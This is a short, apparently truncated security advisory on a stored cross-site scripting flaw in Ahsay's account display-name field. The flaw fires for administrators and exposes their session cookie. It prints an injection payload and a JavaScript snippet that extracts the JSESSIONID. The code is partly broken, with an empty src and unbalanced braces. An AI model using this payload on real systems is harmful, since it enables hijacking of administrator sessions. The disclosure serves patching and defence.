Upgrade to the latest version of Ahsay, currently (

Technical details

When creating an account the field “Alias/Display name” is vulnerable to a stored XSS, this XSS will be triggerd when a administrator visits the “Users, Groups & Policies” page. This stored XSS can be leveraged to steal the administrators cookie, because the cookie is being reflected in the HTML.

'><script src=></script> 


try {
        var scripts = document.getElementsByTagName("script");
        for (var i = 0; i < scripts.length; ++i) {
                js = scripts[i].getAttribute("src").includes("=");
                if (js){
                        cookie = scripts[i].getAttribute("src").split("=")[1];
} catch (err) {
alert(document.URL + ": JSESSIONID=" + cookie); 

resulting in grabbing the cookie shown below: Cookie reflected